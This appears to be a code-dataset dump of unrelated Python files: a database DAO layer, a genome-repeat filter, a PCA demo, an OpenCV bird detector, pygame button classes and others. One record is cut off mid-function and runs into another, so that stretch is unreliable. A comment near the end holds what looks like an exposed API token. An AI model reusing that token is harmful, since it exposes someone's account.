value.\")\n\n attrs['__tablename__'] = attrs.get('__tablename__') or str2hump(name[:-3]) + 's'\n return type.__new__(cls, name, bases, attrs)\n\n\nclass BaseDao(metaclass=DaoMetaClass):\n @classmethod\n def reformatter(cls, data: dict, *args, **kwargs):\n \"\"\"\n 将model数据转换成dao数据\n :param data:\n :return:\n \"\"\"\n return data\n\n @classmethod\n def formatter(cls, data: dict, *args, **kwargs):\n \"\"\"\n 将dao数据转换成model数据\n :param data:\n :return:\n \"\"\"\n return type_to_json(data)\n\n @classmethod\n async def first(cls, ctx: dict = None, query=None, sorter_key: str = 'id', *args, **kwargs):\n \"\"\"\n 获取根据sorter_key倒叙第一个资源 sorter_key 默认id\n :param ctx:\n :param query:\n :return:\n \"\"\"\n if query is None:\n query = {}\n query = cls.reformatter(query, *args, **kwargs)\n table = cls.__db__[cls.__tablename__]\n sql = select([table])\n if query:\n sql = search_sql(sql, query, table)\n sql = sql.order_by(getattr(table.c, sorter_key, table.c.id).desc())\n res = await cls.__db__.execute(ctx=ctx, sql=sql)\n data = await res.first()\n if not data:\n return None\n return cls.formatter(data, *args, **kwargs)\n\n @classmethod\n async def last(cls, ctx: dict = None, query=None, sorter_key: str = 'id', *args, **kwargs):\n \"\"\"\n 获取根据sorter_key倒叙最后一个资源 sorter_key 默认id\n :param ctx:\n :param query:\n :param sorter_key:\n :return:\n \"\"\"\n if query is None:\n query = {}\n query = cls.reformatter(query, *args, **kwargs)\n table = cls.__db__[cls.__tablename__]\n sql = select([table])\n if query:\n sql = search_sql(sql, query, table)\n sql = sql.order_by(getattr(table.c, sorter_key, table.c.id))\n res = await cls.__db__.execute(ctx=ctx, sql=sql)\n\n data = await res.first()\n if not data:\n return None\n return cls.formatter(data, *args, **kwargs)\n\n @classmethod\n async def get(cls, ctx: dict = None, query=None, *args, **kwargs):\n \"\"\"\n 获取单个资源 通常给予unique使用\n :param query:\n :return:\n \"\"\"\n if query is None:\n query = {}\n query = cls.reformatter(query, *args, **kwargs)\n table = cls.__db__[cls.__tablename__]\n sql = select([table])\n if query:\n sql = search_sql(sql, query, table)\n res = await cls.__db__.execute(ctx=ctx, sql=sql)\n data = await res.first()\n if not data:\n return None\n return cls.formatter(data, *args, **kwargs)\n\n @classmethod\n async def query(cls, ctx: dict = None, query: dict = None, pager: dict = None, sorter: dict = None, *args,\n **kwargs):\n \"\"\"\n 通用查询\n :param query:\n :param pager:\n :param sorter:\n :return:\n \"\"\"\n if query is None:\n query = {}\n query = cls.reformatter(query, *args, **kwargs)\n table = cls.__db__[cls.__tablename__]\n sql = select([table])\n if query:\n sql = search_sql(sql, query, table)\n if pager is not None:\n per_page = pager.get('_per_page')\n page = pager.get('_page')\n if per_page:\n sql = sql.limit(per_page)\n if page:\n if per_page is None:\n sql = sql.offset((page - 1) * 30).limit(30)\n else:\n sql = sql.offset((page - 1) * per_page)\n if sorter is None:\n sorter = {}\n order_by = sorter.get('_order_by', 'id')\n desc = sorter.get('_desc', True)\n if desc:\n sql = sql.order_by(getattr(table.c, order_by, table.c.id).desc())\n else:\n sql = sql.order_by(getattr(table.c, order_by, table.c.id))\n res = await cls.__db__.execute(ctx=ctx, sql=sql)\n data = await res.fetchall()\n return list(map(functools.partial(cls.formatter, *args, **kwargs), data))\n\n @classmethod\n async def insert(cls, data: dict, ctx: dict = None, *args, **kwargs):\n \"\"\"\n 通用插入\n :param tx:\n :param args:\n :return:\n \"\"\"\n if data is None:\n return None\n table = cls.__db__[cls.__tablename__]\n data = cls.reformatter(data, *args, **kwargs)\n sql = table.insert().values(**data)\n res = await cls.__db__.execute(ctx=ctx, sql=sql)\n return res.lastrowid\n\n @classmethod\n async def count(cls, ctx: dict = None, query: dict = None, *args, **kwargs):\n \"\"\"\n 计数\n :param query:\n :return:\n \"\"\"\n if query is None:\n query = {}\n query = cls.reformatter(query, *args, **kwargs)\n table = cls.__db__[cls.__tablename__]\n sql = select([func.count('*')], from_obj=table)\n if query:\n sql = search_sql(sql, query, table)\n\n res = await cls.__db__.execute(ctx=ctx, sql=sql)\n return await res.scalar()\n\n @classmethod\n async def execute(cls, ctx: dict = None, sql: str = \"\", *args, **kwargs):\n res = await cls.__db__.execute(ctx=ctx, sql=sql, *args, **kwargs)\n return res\n\n @classmethod\n async def update(cls, ctx: dict = None, where_dict: dict = None, data: dict = None, *args, **kwargs):\n \"\"\"\n 通用修改\n :param ctx:\n :param primay_key:\n :param data:\n :return:\n \"\"\"\n if where_dict is None:\n where_dict = {}\n where_dict = cls.reformatter(where_dict, *args, **kwargs)\n table = cls.__db__[cls.__tablename__]\n data = cls.reformatter(data, *args, **kwargs)\n sql = table.update()\n for key, value in where_dict.items():\n if hasattr(table.c, key):\n sql = sql.where(getattr(table.c, key) == value)\n sql = sql.values(**data)\n res = await cls.__db__.execute(ctx=ctx, sql=sql)\n return res\n\n @classmethod\n async def delete(cls, ctx: dict = None, where_dict: dict = None, *args, **kwargs):\n \"\"\"\n 通用删除\n :param ctx:\n :param where_didt:\n :param data:\n :return:\n \"\"\"\n if where_dict is None:\n where_dict = {}\n where_dict = cls.reformatter(where_dict, *args, **kwargs)\n table = cls.__db__[cls.__tablename__]\n sql = table.delete()\n for key, value in where_dict.items():\n if hasattr(table.c, key):\n sql = sql.where(getattr(table.c, key) == value)\n res = await cls.__db__.execute(ctx=ctx, sql=sql)\n return res\n\n\nclass BusinessBaseDao(BaseDao):\n\n @classmethod\n def formatter(cls, data: dict, *args, **kwargs):\n \"\"\"\n 将dao数据转换成model数据\n :param data:\n :return:\n \"\"\"\n return super().formatter(data)\n\n @classmethod\n def reformatter(cls, data: dict, *args, **kwargs):\n \"\"\"\n 将model数据转换成dao数据\n :param data:\n unscoped: 是否处理软删除\n :return:\n \"\"\"\n new_data = dict()\n for key, value in data.items():\n new_data[key] = value\n if not kwargs.get('unscoped', False) and 'deleted_at' not in data:\n new_data['deleted_at'] = None\n return super().reformatter(new_data)\n\n @classmethod\n async def update(cls, ctx: dict = None, where_dict: dict = None, data: dict = None, unscoped=False,\n modify_by: str = ''):\n \"\"\"\n 业务修改\n :param ctx:\n :param where_dict: 修改数据的条件\n :param data: 修改的数据\n :param modify_by: 修改用户\n :return:\n \"\"\"\n data['updated_at'] = datetime.datetime.now()\n data['updated_by'] = modify_by\n return await super().update(ctx=ctx, where_dict=where_dict, data=data, unscoped=unscoped)\n\n @classmethod\n async def delete(cls, ctx: dict = None, where_dict: dict = None, unscoped=False, modify_by: str = ''):\n \"\"\"\n 业务删除\n :param ctx:\n :param where_dict:\n :param modify_by:\n :return:\n \"\"\"\n if where_dict is None:\n where_dict = {}\n data = dict()\n data['deleted_at'] = datetime.datetime.now()\n data['updated_by'] = modify_by\n return await super().update(ctx=ctx, where_dict=where_dict, data=data, unscoped=unscoped)\n\n @classmethod\n async def insert(cls, ctx: dict = None, data: dict = None, modify_by='', unscoped=False):\n if data is None:\n data = {}\n data['created_at'] = datetime.datetime.now()\n data['created_by'] = modify_by\n return await super().insert(ctx=ctx, data=data, unscoped=unscoped)\n","sub_path":"async_easyapi/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":11354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"491320309","text":"\n\n\ndef ordenarLosMumeros (num1,num2,num3):\n if num10]\n#pdb.set_trace()\n#repeat regions\ndf3=concat([df2.iloc[:,7],df2.iloc[:,0:2]], axis=1)\ndf3=df3.T.reset_index(drop=True).T\n#repeat regions check orientation\ndf4=concat([df2.iloc[:,8],df2.iloc[:,2:4]], axis=1)\n\n#check if needs to be inverted\nnew_index=[]\nnew_index2=[]\nfor i in range(0,df4.index.size):\n if df4.iloc[i,1]>df4.iloc[i,2]:\n new_index.append(df4.index[i])\n else:\n new_index2.append(df4.index[i])\n\n#check if there are any inverted repeats\nif len(new_index)>0:\n df5=df4[df4.index.isin(new_index)]\n #pdb.set_trace()\n cols = df5.columns.tolist()\n #pdb.set_trace()\n cols=[cols[0]]+cols[-1:]+[cols[1]]\n df5=df5[cols].T.reset_index(drop=True).T\n #normal order\n if len(new_index2)>0:\n df6=df4[df4.index.isin(new_index2)].T.reset_index(drop=True).T\n df7=df5.append(df6)\n df8=df7.append(df3)\n #inverted order fixed\n else:\n df8=concat([df5,df3])\n#pdb.set_trace()\nelse:\n df4=df4.T.reset_index(drop=True).T\n df8=concat([df3,df4])\n#------------------------------------------------------------------------------------------\n\n\n\n#save nucmer repeats for exclusion\nwith open(output_file,'w') as output2:\n df8.to_csv(output2, sep='\\t', index=False, header=None)\n\n\n","sub_path":"tools/SNPDEF/common/filter_nucmer/filter_nucmer.py","file_name":"filter_nucmer.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"429934690","text":"\n\nfrom xai.brain.wordbase.nouns._acre import _ACRE\n\n#calss header\nclass _ACRES(_ACRE, ):\n\tdef __init__(self,): \n\t\t_ACRE.__init__(self)\n\t\tself.name = \"ACRES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"acre\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_acres.py","file_name":"_acres.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"422955593","text":"\"\"\"Module to fit a model given a labeled dataset.\"\"\"\nimport sys\nimport pickle\nimport importlib\n\nimport pandas as pd\n\nimport tools\n\n\ndef main(model_type,\n start_version,\n end_version,\n data_source,\n labeled_data):\n \"\"\"Fit a model.\n Args:\n model_type (str): type of model to train.\n start_version (str): version of model to start the training from.\n end_version (str): version to store the parameters.\n data_source (str): source to take the labeled dataset from.\n labeled_data (list): dataset use to train\n [\n ([ 0.0, 6.0, 6.0, 2.0], 1.0)\n ([ 8.0, 7.0, 4.0, 2.0], 1.0)\n ]\n \"\"\"\n # Load data\n labeled_data = load_data(data_source) if labeled_data is None else labeled_data\n\n # Init the model\n model = init_model(model_type)\n\n # Load parameters\n model.load_parameters(model_version=start_version)\n\n # Fit the model\n model.fit(labeled_data,\n alpha=0.00001,\n epochs=20)\n\n # Persist the parameters\n model.persist_parameters(model_version=end_version)\n\n\ndef load_data(data_source):\n \"\"\"Load labeled data.\"\"\"\n with open(\"data/{}/data.pkl\".format(data_source), \"rb\") as handle:\n labeled_data = pickle.load(handle)\n return labeled_data\n\n\ndef init_model(model_type):\n \"\"\"Instanciate an instance of the class of the given type of model.\n Args:\n model_type (str): type of model to train.\n Return:\n model (Model): instance of Model.\n \"\"\"\n # Import model\n model_module = importlib.import_module(\"library.{}.model\".format(model_type))\n # Return the instance\n return model_module.Model()\n\n\nif __name__ == '__main__':\n model = sys.argv[1] if len(sys.argv) > 1 else \"pure_python\"\n source = sys.argv[2] if len(sys.argv) > 2 else \"us_election\"\n main(model,\n start_version=None,\n end_version=\"X\",\n data_source=source,\n labeled_data=None)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"403421583","text":"'''\nCreated on Sept 09, 2016\n\n@author: kalyan\n'''\nfrom math import sqrt, pow, sin, cos\nimport numpy as np\nimport random\n\nimport pdb\n\nc=15.0\nb=5.0\na=2.0\nstepSz = 0.1\ntheta = 60.0/360.0\ncords = []\n\ni=0\nfor x in np.arange(-c,c,stepSz).tolist():\n for y in np.arange(-b,b,stepSz).tolist():\n zmax = a*sqrt(min(1.0,max(0.0, 1.0 - pow(x,2)/pow(c,2) - pow(y,2)/pow(b,2))))\n zmin = -a*sqrt(min(1.0,max(0.0, 1.0 - pow(x,2)/pow(c,2) - pow(y,2)/pow(b,2))))\n for z in np.arange(zmin,zmax,stepSz).tolist():\n cords.append([x,y,z])\nrandom.shuffle(cords)\ncords = np.asarray(cords)\ncords = cords[0:2000,:]\n\n#cords = np.dot(cords, np.array([[cos(theta), -sin(theta), 0],[sin(theta), cos(theta), 0],[0, 0, 1]]))\n#cords = np.dot(cords, np.array([[cos(theta), 0, sin(theta)],[0, 1, 0],[-sin(theta), 0, cos(theta)]]))\n#pdb.set_trace()\n#print len(cords)\n'''\nPlot using Matplotlib \n'''\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef plot3D(xCords,col):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n \n ax.scatter(xCords[:,0], xCords[:,1], xCords[:,2], color=col,\n label='Standardized [$N (\\mu=0, \\; \\sigma=1)$]', alpha=0.3)\n\n ax.set_xlabel('X-Axis')\n ax.set_ylabel('Y-Axis')\n ax.set_zlabel('Z-Axis')\n plt.grid()\n plt.tight_layout()\n\nplot3D(cords,'red')\n#plt.show()\n\nfrom sklearn.decomposition import PCA as sklearnPCA\nsklearn_pca = sklearnPCA(n_components=2,whiten=True)\nY_sklearn = sklearn_pca.fit_transform(cords)\nXX = sklearn_pca.inverse_transform(Y_sklearn)\n\nplot3D(Y_sklearn,'green')\nplt.show()\n","sub_path":"demo02_PCA.py","file_name":"demo02_PCA.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"532644358","text":"import cv2\n# import nexmo\n\n# Nexmo messaging\n# client = nexmo.Client(key='Your nexmo key', secret='Your nexmo secret key')\nnumber = \"your phone number with the country code\"\nmessage = \"Pigeons have entered your farm\"\n\n\n# initalizing the camera\ncap = cv2.VideoCapture('birds.mp4')\nbirdsCascade = cv2.CascadeClassifier(\"birds1.xml\")\nMAX_NUM_BIRDS = 5\nrunning = True\ncount = 0\n\n# Detecting the birds\nwhile running:\n # if count == 1:\n # # response = client.send_message({\n # # 'from': 'GYMAALE',\n # # 'to': number,\n # # 'text': message,\n # # })\n # # response = response['messages'][0]\n # # if response['status'] == '0':\n # # print(\"MESSAGE DELIVERED SUCCESSFULLY\", response['message-id'])\n # # else:\n # # print(\"ERROR SENDING MESSAGE\", response['error-text'])\n count += 1\n ret, frame = cap.read()\n print(\"Ret is \", ret)\n if ret:\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n birds = birdsCascade.detectMultiScale(\n gray,\n scaleFactor=1.4,\n minNeighbors=1,\n # minSize=(10,10),\n maxSize=(30, 30),\n flags=cv2.CASCADE_SCALE_IMAGE\n )\n\n if (len(birds) >= MAX_NUM_BIRDS):\n print(\"Detected {0} Birds.\".format(len(birds)))\n\n # Drawing a rectangle around a bird approaching the farm\n for (x, y, w, h) in birds:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 200, 0), 2)\n\n # Displaying the resulting frame\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n running = False\n else:\n running = False\n\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"404392978","text":"# --------------------------------------------------------------------\r\n# Program: Button Classes\r\n# Author: Alex Hyde\r\n# Date: Oct 25 2019\r\n# Description: Button classes for creating buttons and processing\r\n# button clicks. Fully customizable with custom on click and release\r\n# functions.\r\n# Input: Allows easy processing of user clicks.\r\n# --------------------------------------------------------------------\r\n\r\nimport pygame\r\nimport label\r\nimport color as c\r\n\r\npygame.init()\r\n\r\n# alignment constants\r\nLEFT = 0\r\nRIGHT = 1\r\nTOP = 0\r\nBOTTOM = 1\r\nCENTER = 0.5\r\n\r\n\r\n# button list class for easily processing multiple buttons on one screen\r\nclass ButtonList:\r\n def __init__(self, buttonList=None):\r\n if buttonList is None:\r\n buttonList = []\r\n self.buttonList = list(buttonList) # if passed a tuple\r\n self.current = -1 # used for iteration\r\n self.clicked = []\r\n self.released = []\r\n self.hovered = []\r\n self.visible = True\r\n self.active = True\r\n\r\n # return button index, given the button\r\n def find(self, item):\r\n if item in self.buttonList:\r\n return self.buttonList.index(item)\r\n else:\r\n return -1\r\n\r\n # returns button given its index\r\n def get(self, ind):\r\n return self.buttonList[ind]\r\n\r\n def set(self, ind, new):\r\n self.buttonList[ind] = new\r\n\r\n # return button at a set of coordinates, -1 if the is no button at those coordinates\r\n def get_button_at(self, pos):\r\n for b in self.buttonList:\r\n if b.is_hover(pos):\r\n return b\r\n return -1\r\n\r\n def draw(self, win):\r\n if self.visible: # if button list is visible\r\n for b in self.buttonList:\r\n b.draw(win)\r\n\r\n def add(self, button):\r\n self.buttonList.append(button)\r\n\r\n # process button clicks, releases and hovers\r\n def process_events(self, click_bool, release_bool, mousepos):\r\n self.released = []\r\n self.clicked = []\r\n self.hovered = []\r\n if self.active: # if the button list is active\r\n for b in self.buttonList:\r\n if type(b) == Slider:\r\n b.process(click_bool, release_bool, mousepos)\r\n elif (b.is_hover(mousepos) or b.is_clicked) and b.is_active():\r\n if click_bool:\r\n b.on_click_default()\r\n b.on_click(b)\r\n self.clicked.append(b)\r\n elif release_bool and b.is_clicked:\r\n b.on_release_default()\r\n b.on_release(b)\r\n self.released.append(b)\r\n else:\r\n b.on_hover()\r\n self.hovered.append(b)\r\n else:\r\n b.reset_color()\r\n else:\r\n for b in self.buttonList:\r\n if type(b) == Slider:\r\n b.slide_button.reset_color()\r\n else:\r\n b.reset_color()\r\n\r\n # return all clicked buttons\r\n def get_clicked(self):\r\n return self.clicked\r\n\r\n # return all released buttons\r\n def get_released(self):\r\n return self.released\r\n\r\n # return all hovered buttons\r\n def get_hovered(self):\r\n return self.hovered\r\n\r\n def set_visible(self, b):\r\n self.visible = b\r\n\r\n def set_active(self, b):\r\n self.active = b\r\n\r\n # add two button lists\r\n def __add__(self, other):\r\n return ButtonList(self.buttonList + other.buttonList)\r\n\r\n # used for iteration\r\n def __iter__(self):\r\n return self\r\n\r\n # used for iteration\r\n def __next__(self):\r\n self.current += 1\r\n if self.current < len(self.buttonList):\r\n return self.buttonList[self.current]\r\n self.current = -1\r\n raise StopIteration\r\n\r\n\r\nclass Button:\r\n def __init__(self, rect, fColor=(255, 255, 255), bColor=(0, 0, 0), onHoldColor=(100, 100, 100),\r\n onHoverColor=(200, 200, 200), tColor=(0, 0, 0), border=1, text=\"\", visible=True, active=True,\r\n tAlignx=CENTER, tAligny=CENTER, text_size=18):\r\n self.x, self.y, self.w, self.h = rect\r\n self.b = border\r\n\r\n self.text = text\r\n self.text_size = text_size\r\n # text alignment\r\n self.tAlignx = tAlignx\r\n self.tAligny = tAligny\r\n # colors\r\n self.fColor = fColor\r\n self.onHoldColor = onHoldColor\r\n self.currentFillColor = fColor\r\n self.onHoverColor = onHoverColor\r\n self.bColor = bColor\r\n self.tColor = tColor\r\n # rendering text drawable\r\n self.rendered_text = None\r\n self.render_text()\r\n\r\n self.visible = visible\r\n self.active = active\r\n self.is_clicked = False\r\n self.is_hovered = False\r\n self.on_click = self.blank_func # on click function (to be replaced in an instantiated button)\r\n self.on_release = self.blank_func # on release function (to be replaced in an instantiated button)\r\n self.values = {} # can be used to store custom values\r\n\r\n def draw(self, win):\r\n if self.visible:\r\n if self.currentFillColor is not None:\r\n pygame.draw.rect(win, self.currentFillColor, self.rect())\r\n if self.bColor is not None:\r\n self.draw_border(win)\r\n self.rendered_text.draw(win)\r\n\r\n def draw_border(self, win):\r\n x, y, w, h = self.rect()\r\n pygame.draw.rect(win, self.bColor, (x, y, w, self.b))\r\n pygame.draw.rect(win, self.bColor, (x, y + self.b, self.b, h - self.b))\r\n pygame.draw.rect(win, self.bColor, (x + self.b, y + h - self.b, w - self.b, self.b))\r\n pygame.draw.rect(win, self.bColor, (x + w - self.b, y + self.b, self.b, h - self.b))\r\n\r\n # renders text drawable\r\n def render_text(self):\r\n self.rendered_text = label.Label(self.text, color=self.tColor, size=self.text_size)\r\n self.reset_text_pos()\r\n\r\n # sets text drawable position (based on alignment)\r\n def reset_text_pos(self):\r\n self.rendered_text.set_x(self.x + (self.w-self.rendered_text.get_width())*self.tAlignx)\r\n self.rendered_text.set_y(self.y + (self.h-self.rendered_text.get_height())*self.tAligny)\r\n\r\n # empty function (to be replaced by custom functions in instantiated button objects)\r\n def blank_func(self, blank):\r\n pass\r\n\r\n # return boolean if the mouse position collides with the button\r\n def is_hover(self, mousepos):\r\n x, y = mousepos\r\n return self.x < x < self.x + self.w and self.y < y < self.y + self.h\r\n\r\n # default function when button if clicked (change color)\r\n def on_click_default(self):\r\n self.currentFillColor = self.onHoldColor\r\n self.is_clicked = True\r\n\r\n # default function when button if released (change color)\r\n def on_release_default(self):\r\n self.currentFillColor = self.fColor\r\n self.is_clicked = False\r\n\r\n # default function when button if hovered (change color)\r\n def on_hover(self):\r\n if not self.is_clicked:\r\n self.currentFillColor = self.onHoverColor\r\n\r\n def convert_to_slider(self, slide_wh, change=False, text_slider_percent=50, color=c.WHITE, bColor=c.BLACK, border=1,\r\n start_value=0, end_value=100, slide_value=None, slide_color=c.BLACK, text_size=18,\r\n tColor=c.BLACK, slider_border=5):\r\n return Slider(self.rect(), slide_wh, text_slider_percent, color, bColor, border, start_value, end_value,\r\n slide_value, slide_color, self.text, self.text_size, self.tAlignx, self.tAligny, tColor,\r\n slider_border, self.fColor, self.bColor, self.onHoldColor, self.onHoverColor,\r\n visible=self.visible, active=self.active)\r\n\r\n # --------------------SETTER AND GETTER METHODS--------------------\r\n\r\n def set_text(self, text):\r\n self.text = text\r\n self.render_text()\r\n\r\n def rect(self):\r\n return self.x, self.y, self.w, self.h\r\n\r\n def set_x(self, x):\r\n xdif = x - self.x\r\n self.x += xdif\r\n self.rendered_text.set_x(self.rendered_text.x + xdif)\r\n\r\n def set_y(self, y):\r\n ydif = y - self.y\r\n self.y += ydif\r\n self.rendered_text.set_y(self.rendered_text.y + ydif)\r\n\r\n def get_text(self):\r\n return self.text\r\n\r\n def get_label(self):\r\n return self.rendered_text\r\n\r\n def set_text_size(self, size):\r\n self.text_size = size\r\n self.render_text()\r\n\r\n def set_fColor(self, color):\r\n self.fColor = color\r\n if not self.is_clicked and not self.is_hovered:\r\n self.currentFillColor = self.fColor\r\n\r\n def set_hoverColor(self, color):\r\n self.onHoverColor = color\r\n if self.is_hovered and not self.is_clicked:\r\n self.currentFillColor = self.onHoverColor\r\n\r\n def set_holdColor(self, color):\r\n self.onHoldColor = color\r\n if not self.is_hovered and self.is_clicked:\r\n self.currentFillColor = self.onHoldColor\r\n\r\n def set_bColor(self, color):\r\n self.bColor = color\r\n\r\n def reset_color(self):\r\n self.currentFillColor = self.fColor\r\n\r\n def set_active(self, torf):\r\n self.active = torf\r\n\r\n def is_active(self):\r\n return self.active\r\n\r\n def set_visible(self, torf):\r\n self.visible = torf\r\n\r\n def is_visible(self):\r\n return self.visible\r\n\r\n def color_scheme(self, color):\r\n if color == \"black\":\r\n self.fColor = c.BLACK\r\n self.tColor = c.WHITE\r\n self.bColor = c.WHITE\r\n self.onHoverColor = c.grey(100)\r\n self.onHoldColor = c.grey(150)\r\n elif color == \"white\":\r\n self.fColor = c.WHITE\r\n self.tColor = c.BLACK\r\n self.bColor = c.BLACK\r\n self.onHoverColor = c.grey(200)\r\n self.onHoldColor = c.grey(100)\r\n elif color == \"red\":\r\n self.fColor = c.RED\r\n self.tColor = c.BLACK\r\n self.bColor = c.BLACK\r\n self.onHoverColor = c.basic_color(180, \"r\", 80)\r\n self.onHoldColor = c.basic_color(120, \"r\", 70)\r\n elif color == \"green\":\r\n self.fColor = c.GREEN\r\n self.tColor = c.BLACK\r\n self.bColor = c.BLACK\r\n self.onHoverColor = c.basic_color(180, \"g\", 80)\r\n self.onHoldColor = c.basic_color(120, \"g\", 70)\r\n elif color == \"blue\":\r\n self.fColor = c.BLUE\r\n self.tColor = c.BLACK\r\n self.bColor = c.BLACK\r\n self.onHoverColor = c.basic_color(180, \"b\", 80)\r\n self.onHoldColor = c.basic_color(120, \"b\", 70)\r\n self.render_text()\r\n self.reset_color()\r\n\r\n\r\nclass Slider:\r\n def __init__(self, rect, slide_wh, text_slider_percent=50, color=c.WHITE, bColor=c.BLACK, border=1, start_value=0,\r\n end_value=100, slide_value=None, slide_color=c.BLACK, text=\"\", text_size=18, tAlignx=CENTER,\r\n tAligny=CENTER, tColor=c.BLACK, slider_border=5,\r\n butfColor=(255, 255, 255), butbColor=(0, 0, 0), butonHoldColor=(100, 100, 100),\r\n butonHoverColor=(200, 200, 200), buttColor=(0, 0, 0), butborder=1, buttext=\"\", visible=True,\r\n active=True, buttext_size=10):\r\n self.x, self.y, self.w, self.h = rect\r\n self.b = border\r\n self.text_h = (self.h - self.b * 2) * text_slider_percent/100\r\n self.slider_h = (self.h - self.b * 2) - self.text_h\r\n self.slide_x1 = self.x + self.b + slider_border\r\n self.slide_x2 = self.x + self.w - self.b - slider_border\r\n self.slide_y = self.y + self.h - self.b - self.slider_h/2\r\n self.slide_button = Button((self.slide_x1 - slide_wh[0]/2, self.slide_y - slide_wh[1]/2, slide_wh[0],\r\n slide_wh[1]),\r\n butfColor, butbColor, butonHoldColor, butonHoverColor, buttColor,\r\n butborder, buttext, visible, active, CENTER, CENTER, buttext_size)\r\n self.slide_color = slide_color\r\n self.color = color\r\n self.bColor = bColor\r\n self.tColor = tColor\r\n self.text = text\r\n self.is_dynamic_text = \"@\" in text\r\n self.text_size = text_size\r\n self.tAlignx = tAlignx\r\n self.tAligny = tAligny\r\n self.start_value = start_value\r\n self.end_value = end_value\r\n self.visible = visible\r\n if slide_value is None:\r\n slide_value = start_value\r\n elif slide_value < start_value or slide_value > end_value:\r\n raise Exception(\"Slider value outside of slider range\")\r\n self.slide_value = slide_value\r\n self.buttonx = self.slide_x1 + (self.slide_x2 - self.slide_x1) * self.convert_slider_value_to_percent()\r\n self.slide_button.set_x(self.buttonx - self.slide_button.w/2)\r\n\r\n self.action = self.blank_func\r\n\r\n self.rendered_text = None\r\n self.render_text()\r\n\r\n def draw(self, win):\r\n if self.is_visible():\r\n pygame.draw.rect(win, self.color, self.rect())\r\n self.draw_border(win)\r\n self.draw_slider(win)\r\n self.rendered_text.draw(win)\r\n\r\n def draw_slider(self, win):\r\n pygame.draw.line(win, self.slide_color, (self.slide_x1, self.slide_y), (self.slide_x2, self.slide_y), 3)\r\n self.slide_button.draw(win)\r\n\r\n def draw_border(self, win):\r\n x, y, w, h = self.rect()\r\n pygame.draw.rect(win, self.bColor, (x, y, w, self.b))\r\n pygame.draw.rect(win, self.bColor, (x, y + self.b, self.b, h - self.b))\r\n pygame.draw.rect(win, self.bColor, (x + self.b, y + h - self.b, w - self.b, self.b))\r\n pygame.draw.rect(win, self.bColor, (x + w - self.b, y + self.b, self.b, h - 2 * self.b))\r\n\r\n def dynamic_text(self):\r\n return self.text.replace(\"@\", str(int(self.slide_value)))\r\n\r\n # returns the slider's value\r\n def value(self):\r\n return self.slide_value\r\n\r\n # empty function (to be replaced by custom functions in instantiated button objects)\r\n def blank_func(self, blank):\r\n pass\r\n\r\n # renders text drawable\r\n def render_text(self):\r\n self.rendered_text = label.Label(self.dynamic_text(), color=self.tColor, size=self.text_size)\r\n self.reset_text_pos()\r\n\r\n # sets text drawable position (based on alignment)\r\n def reset_text_pos(self):\r\n self.rendered_text.set_x(self.x + (self.w - self.rendered_text.get_width()) * self.tAlignx)\r\n self.rendered_text.set_y(self.y + self.b + (self.text_h - self.rendered_text.get_height()) * self.tAligny)\r\n\r\n def convert_slider_pos_to_percent(self):\r\n return (self.buttonx - self.slide_x1) / (self.slide_x2 - self.slide_x1)\r\n\r\n def convert_slider_value_to_percent(self):\r\n return (self.slide_value - self.start_value) / (self.end_value - self.start_value)\r\n\r\n def rect(self):\r\n return self.x, self.y, self.w, self.h\r\n\r\n def process(self, click_bool, release_bool, mousepos):\r\n if (self.slide_button.is_hover(mousepos) or self.slide_button.is_clicked) and self.slide_button.is_active():\r\n if click_bool:\r\n self.slide_button.on_click_default()\r\n elif release_bool and self.slide_button.is_clicked:\r\n self.slide_button.on_release_default()\r\n else:\r\n self.slide_button.on_hover()\r\n else:\r\n self.slide_button.reset_color()\r\n\r\n if self.slide_button.is_clicked:\r\n x = mousepos[0]\r\n if x < self.slide_x1:\r\n x = self.slide_x1\r\n elif x > self.slide_x2:\r\n x = self.slide_x2\r\n self.slide_button.set_x(int(x - self.slide_button.w/2))\r\n self.buttonx = x\r\n\r\n self.slide_value = self.start_value + (self.end_value - self.start_value) * self.convert_slider_pos_to_percent()\r\n\r\n if self.is_dynamic_text:\r\n self.render_text()\r\n\r\n self.action(self)\r\n\r\n def is_visible(self):\r\n return self.visible\r\n\r\n def get_label(self):\r\n return self.rendered_text\r\n\r\n def set_text_size(self, size):\r\n self.text_size = size\r\n self.render_text()\r\n\r\n def set_value(self, v):\r\n self.slide_value = v\r\n if self.slide_value < self.start_value or self.slide_value > self.end_value:\r\n raise Exception(\"Slider value outside of slider range\")\r\n self.buttonx = self.slide_x1 + (self.slide_x2 - self.slide_x1) * self.convert_slider_value_to_percent()\r\n self.slide_button.set_x(self.buttonx - self.slide_button.w / 2)\r\n","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":16789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"206716000","text":"import pandas as pd\nimport talib\nimport numpy as np\nimport requests\nimport os\nimport colorama\nimport plotly.graph_objs as go\nimport plotly.offline as offline\nfrom plotly import tools\nfrom configs.vars import *\nfrom termcolor import cprint\ncolorama.init()\n# 3d7d3e9e6006669ac00584978342451c95c3c78421268ff7aeef69995f9a09ce\n\n# TODO\n# X fazer com que a database seja salva com todos os indicadores\n# - organizar essas 